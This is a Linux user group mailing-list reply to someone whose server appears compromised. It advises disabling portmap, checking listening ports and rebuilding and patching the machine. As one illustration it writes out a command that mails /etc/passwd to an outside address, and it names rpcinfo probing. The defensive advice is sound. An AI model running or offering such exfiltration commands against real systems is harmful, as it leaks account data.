> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host
Why are you rnning the portmapper? Turn it off if youdon't specifically
need it.
a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)
If you don't recognize it as something you specifically need - turn it
off. :)
Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p <yourip> or similar and your config recognized that he
wasn't allowed.
As above - if you don't need portmap, turn it off.
> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?
Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer oveflow with something like
"/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc.. (or somehting like
that)..
It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).
If you can, pull the box out of prod and put in a new box while you
examine the compromised one.
//umar.
--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug
